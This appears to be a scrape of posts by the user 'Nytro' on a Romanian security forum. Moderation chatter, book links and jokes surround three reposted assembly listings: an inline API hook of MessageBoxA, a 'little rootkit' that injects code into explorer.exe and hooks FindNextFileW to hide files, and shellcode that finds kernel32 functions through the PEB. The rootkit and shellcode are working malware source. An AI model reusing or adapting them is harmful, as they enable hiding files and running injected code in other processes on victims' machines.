Nytro

Da, comentezi aiurea, ii dadeam ban pana acum link-ul e scos... Nu vad unde e problema. Doar ca se muta la Gunoi.

Si asa nu o sa gaseasca nici un domeniu cei care chiar ar avea nevoie de unul. Pentru ca 45% dintre voi nu veti folosi nici un domeniu ales, si 45% veti folosi doar unul. Dar ce conteaza ca nu va trebuie, luati sa aveti Eu am luat doar nytro.free, sa speram ca il voi primi prin 2012.

Asta inainte de ce e mai sus: YouTube - Telecomanda Plural - NU STIU

La ce foloseste sa modifici un fisier text?

Parca la Selenity CMS facusem un mic sistem de blogging, dar chiar nu iti recomand porcaria aia ca materia de studiu. Invata HTTP/HTML/PHP/MySQL/JavaScript/CSS si o sa intelegi singur cum se face.

Nu mai bine facem un program util, care sa faca ceva frumos?

Nu am acces, dar daca ii dai lu kwe sarutu ala o sa iti mareasca el spatiu. PS: Sa nu te prind fara o sticla de alcool, poimaine fac 3 zile de cand n-am mai baut :-> A, eu nu merg prea des la scoala, dar am si zile in care stau la aproape toate cursurile. Dai un semn. Mai e cineva la Universitatea Bucuresti la Informatica?

Am avut o mica problema cu mesageria privata, problema se datoreaza vBulletinului si browserelor cred, dar s-a rezolvat. Daca cineva mi-a trimis in ultimul timp un mesaj ce prezinta o anumita importanta, il rog sa imi trimita din nou. Nu voi detalia cauzele problemei, pot sa apara si la alte conturi, dar cred ca singura problema a fost la contul meu datorita unor "teste"

Basic: http://visualbasic.freetutes.com/learn-vb6/ Advanced: http://visualbasic.freetutes.com/learn-vb6-advanced/

Probabil keyloggerul folosea keyboard hook si nu anticul GetAsyncKeyState.

In ziua de azi nu poti scrie un program de 2 linii de cod, deoarece acestea sunt folosite si de tot felul de pseudo-virusi care sunt detectati de toti pseudo-antivirusii. Daca cineva crede ca acest programel e infectat sau face cine stie de tampenie (desi nu vad ce ar putea face) e liber sa analizeze programul, sa il dezasambleze, orice.

Nicolae Guta - Leii grei

Arhitectura calculatorului (sau sistemelor de calcul) - Adrian Atanasiu, Ed. Infodata Programarea procesoarelor Intel (parca) - Vasile Lungu, Ed. Teora

Cel mai bine se invata din carti, dar sunt si tutoriale bune. Eu fac ASM la facultate (la Arhitectura Sistemelor de Calcul - Universitatea Bucuresti, Informatica).

Credits: Alan Website: Ellicit.org .486 .MODEL FLAT, STDCALL OPTION CASEMAP:NONE INCLUDE C:\masm32\include\windows.inc INCLUDE C:\masm32\include\kernel32.inc INCLUDE C:\masm32\include\user32.inc INCLUDELIB C:\masm32\lib\kernel32.lib INCLUDELIB C:\masm32\lib\user32.lib .DATA LibName DB 'user32.dll', 0 APIName DB 'MessageBoxA', 0 .DATA? OgMessageBoxA DD ? .CODE HookAPI PROC Origin:DWORD, Destination:DWORD, CodeLength:DWORD LOCAL Protection:DWORD PUSH ESI PUSH EDI INVOKE VirtualProtect, Origin, CodeLength, PAGE_READWRITE, ADDR Protection MOV EAX, CodeLength ADD EAX, 5h INVOKE VirtualAlloc, NULL, EAX, MEM_RESERVE or MEM_COMMIT, PAGE_EXECUTE_READWRITE PUSH EAX MOV EDI, EAX MOV ESI, Origin MOV ECX, CodeLength REP MOVSB MOV BYTE PTR [EDI], 0E9h MOV ECX, Origin SUB ECX, EAX SUB ECX, 5h MOV [EDI + 1h], ECX MOV EDI, Origin MOV BYTE PTR [EDI], 0E9h MOV ECX, Destination SUB ECX, Origin SUB ECX, 5h MOV [EDI + 1h], ECX INVOKE VirtualProtect, Origin, CodeLength, Protection, ADDR Protection POP EAX POP EDI POP ESI RET HookAPI ENDP HkMessageBoxA PROC hWnd:DWORD, lpText:DWORD, lpCaption:DWORD, uType:DWORD .IF uType == NULL ;If user application provides NULL/MB_OK we will give them a nice icon too PUSH MB_ICONEXCLAMATION .ELSE PUSH uType .ENDIF PUSH lpCaption PUSH lpText PUSH hWnd CALL OgMessageBoxA ;EAX holds result we could change it here if we wished before returning to the user application RET HkMessageBoxA ENDP ENTRY: INVOKE MessageBoxA, NULL, OFFSET APIName, OFFSET LibName, NULL ;Non hooked MessageBoxA works as programmer made it INVOKE LoadLibraryA, OFFSET LibName INVOKE GetProcAddress, EAX, OFFSET APIName INVOKE HookAPI, EAX, OFFSET HkMessageBoxA, 0Bh MOV OgMessageBoxA, EAX ;Remember to save the offset for the hooked function to call the original INVOKE MessageBoxA, NULL, OFFSET APIName, OFFSET LibName, NULL ;Hooked MessageBoxA with our evil icon adding patch INVOKE ExitProcess, NULL END ENTRY COMMENT ^ Win2000SP4.USER32!MessageBoxA 77E38098 > 55 PUSH EBP 77E38099 8BEC MOV EBP,ESP 77E3809B 51 PUSH ECX 77E3809C 833D 3892E677 00 CMP DWORD PTR DS:[77E69238],0 ^

Author: EON - Hi, this code hook the FindNextFileW api to hide all the files that begin with "~". Change the pid for the pid of explorer.exe to saw the effect. ; ******************************************************* ; *** Example of a little rootkit that hide all the *** ; *** files that begin with "~" without use Dll. *** ; *** *** ; *** By E0N (L) 2008 *** ; ******************************************************* include 'H:\archivos de programa\fasm\include\win32ax.inc' .data HookApi db 'FindNextFileW' , 0 ; Name of the api to hook HookDll db 'Kernel32.dll' , 0 ; Name of the DLL that contain it DirApi dd ? ; Direction of the api to hook process dd ? pid dd 2160 ; PID of the process to hook x dd 7 ; Number of bytes that have the api at begin BufferCall dd ? ; Buffer to call the api api (in our process) inyBufferCall dd ? ; Pointer to the buffer to call the api when injected tamFun dd ? ; Size of function that will replace the api inyFun dd ? ; Pointer to this buffer when injected BufferApi dd ? ; 5 bytes buffer for replace the begin of api struct Datos sBufferCall dd ? ; Pointer to inyBufferCall to can call the original api ends dat Datos ? SizeofDatos dd 4 dirStruct dd ? ; Pointer to structure when injected Prote dd ? ; To call VirtualProtect .code start: ; Get handle of process when we will inject mov eax, PROCESS_VM_OPERATION or eax, PROCESS_VM_WRITE invoke OpenProcess, eax, FALSE, [pid] mov [process], eax ; Get direction of api to Hook invoke GetModuleHandle, HookDll invoke GetProcAddress, eax, HookApi mov [DirApi], eax ; Make the buffer to call the api: ; x bytes | 1 byte | 4 byte | 1 byte ; x first bytes of api | push [0x68] | DirApi + x | ret [0xC3] mov eax, dword [x] add eax, 6 invoke LocalAlloc, LPTR, eax ; eax = x + 6 mov [BufferCall], eax invoke RtlMoveMemory, [BufferCall], [DirApi], [x] ; Copiamos los x primeros bytes del api mov eax, [BufferCall] add eax, [x] mov byte [eax], 0x68 inc eax mov ebx, [DirApi] add ebx, [x] mov dword [eax], ebx add eax, 4 mov byte [eax], 0xC3 ; Inject this buffer mov eax, MEM_RESERVE ; eax = MEM_RESERVE | MEM_COMMIT or eax, MEM_COMMIT mov ecx, [x] ; ecx = x + 6 add ecx, 6 invoke VirtualAllocEx, [process], 0, ecx, eax, PAGE_READWRITE mov [inyBufferCall], eax mov ebx, [x] ; ebx = x + 6 add ebx, 6 invoke WriteProcessMemory, [process], [inyBufferCall], [BufferCall], ebx, NULL ; Initialize the structure mov eax, [inyBufferCall] ; Metemos el puntero al buffer para llamar mov [dat.sBufferCall], eax ; con normalidad al api ; Inject structure mov eax, MEM_RESERVE or eax, MEM_COMMIT invoke VirtualAllocEx, [process], 0, [SizeofDatos], eax, PAGE_READWRITE mov [dirStruct], eax invoke WriteProcessMemory, [process], [dirStruct], dat, [SizeofDatos], NULL ; Change the 0x0000 for a pointer to the structure mov ebx, CAMBIO ; ebx = El 0x0000 que hay que cambiar (4 bytes) sub ebx, 4 invoke VirtualProtect, ebx, 6, PAGE_EXECUTE_READWRITE, Prote invoke RtlMoveMemory, ebx, dirStruct, 4 ; Calculate the size of the function to inject mov eax, FIN_MyFindNextFileW sub eax, MyFindNextFileW mov [tamFun], eax ; Inject the function mov eax, MEM_RESERVE ; eax = MEM_RESERVE | MEM_COMMIT or eax, MEM_COMMIT invoke VirtualAllocEx, [process], 0, [tamFun], eax, PAGE_EXECUTE_READWRITE mov [inyFun], eax invoke WriteProcessMemory, [process], [inyFun], MyFindNextFileW, [tamFun], NULL ; Make a buffer to hook the api ; 1 bytes | 4 bytes ; jmp [0xE9] | Size of jump invoke LocalAlloc, LPTR, 5 mov [BufferApi], eax mov byte [eax], 0xE9 inc eax mov ebx, [inyFun] sub ebx, [DirApi] sub ebx, 5 ; 5 = -1 por el 0xE9 y -4 por la dirección mov dword [eax], ebx ; Inject this buffer in the begin of api mov eax, MEM_RESERVE ; eax = MEM_RESERVE | MEM_COMMIT or eax, MEM_COMMIT invoke VirtualAllocEx, [process], [DirApi], 5, eax, PAGE_EXECUTE_READWRITE invoke WriteProcessMemory, [process], [DirApi], [BufferApi], 5, NULL invoke ExitProcess, 0 ; Funtion that will replace the api proc MyFindNextFileW hFindFile, lpFindFileData OK: mov ebx, 0x0000 ; This 0x0000 will do a pointer to the buffer before inject CAMBIO: push [lpFindFileData] push [hFindFile] call dword [ebx] mov ebx, eax cmp ebx, 0 je RETORNAR_FIN mov eax, [lpFindFileData] ; add eax, 44 cmp byte [eax], '~' je OK mov eax, 1 ret RETORNAR_FIN: mov eax, 0 ret endp FIN_MyFindNextFileW: .end start In conclusion, is a little-rootkit without dll.

Credits : HUTCH pour la fonction StringCompare PHRACK pour le tips pour récuperer K32 Reference : NEITSA pour la méthodo Author: steve10120 call .hwndDelta .hwndDelta: pop ebp sub ebp, .hwndDelta .find_kernel: mov eax, [fs:30h] ;EAX = PEB base mov eax, [eax + 0ch] ;EAX = PEB_LDR_DATA mov esi, [eax + 1ch] ;first entry in InInitializationOrderModuleList lodsd ;forward to next LIST_ENTRY mov ebx, [eax + 08h] ;EBX = Kernel32 base memory mov [ebp + _kernelBase], ebx mov esi, dword[ebx + 3Ch] ;ESI = PE MAGIC add esi, [ebp + _kernelBase] mov edx, [esi + 078h] ;EDX = RVA table export add edx, [ebp + _kernelBase] ;EDX = VA table export mov ecx, [edx + 018h] ;ECX = nombre d'export de la DLL mov [ebp + _function_nb], ecx mov ebx, [edx + 020h] ;EBX = VA du pointeur de nom add ebx, 4 add ebx, [ebp + _kernelBase] ;EBX = VA table export ;A partir de la on a tous les éléments pour rechercher les fonctions ;Recuperation de GetProcAddress pushad lea edi, [ebp + _szGetProcAddress] ;EDI = GetProcAddress string call .find_function mov [ebp + _getProcAddress], eax popad ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;Recuperation de LoadLibrary pushad lea edi, [ebp + _szLoadLibrary] ;EDI = GetProcAddress string call .find_function mov [ebp + _loadLibrary], eax popad ;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;TEST MESSAGEBOX ; lea ebx,[ebp +_szUser32] push ebx call [ebp +_loadLibrary] ; lea ebx,[ebp +_szMessageBox] push ebx push eax lea edx, [ebp +_getProcAddress] call dword[edx] ; push 0 lea esi, [ebp +_szGetProcAddress] push esi lea edi, [ebp +_szGetProcAddress] push edi push 0 call eax ;;;;;;;;;;;;;;;; ret .find_function: .find_function_loop: mov esi, dword[ebx] ;ESI = RVA STRING FUNC add ebx, 4 add esi, [ebp + _kernelBase] ;EBX = VA STRING FUNC dec ecx ;ECX = ECX - 1 call .stringCompare cmp eax, -1 je .find_function_loop mov ebx, [edx + 01ch] ; ebx = export table address RVA add ebx, [ebp + _kernelBase] ; pointeur vers table d'export mov edx, dword[_function_nb] sub edx, ecx imul edx, edx, 4 add ebx, edx mov eax, ebx mov eax, dword[eax] add eax, [ebp + _kernelBase] ret .stringCompare: pushad mov ecx, esi mov edx, edi .cmst: mov al, [ecx] cmp al, [edx] jne .no_match add ecx, 1 add edx, 1 test al, al jne .cmst popad xor eax, eax ret .no_match: popad mov eax, -1 ret _szGetProcAddress db "GetProcAddress",0 _szLoadLibrary db "LoadLibraryA",0 _kernelBase dd ? _function_nb dd ? _szMessageBox db "MessageBoxA",0 _szUser32 db "user32.dll",0 _getProcAddress dd ? _loadLibrary dd ?

Nu dai si tu de baut? :->

Da, utilizatori (useri) porno.

Da, tipic. Windu: O sa vezi multe astfel de comentarii, sugestia mea e sa nu le iei in seama.

Voi chiar ati descarcat ce a postat? Dupa ce v-a spus ce contine?

Unde a fost? Putea sa participe oricine?

Topic de cacat. Au rezultat 8 avertismente care au dus la cateva banuri. Se muta la gunoi.

Binary Code Modification [Patching Vulnerabilities] Download: http://www.securityarchitect.org/binary-english.pdf

Dragut, toate posturile nu au nici o legatura cu acel program, deci toate au primit warn. Si au rezultat 3 banuri. In caz ca nu ati observat, am revenit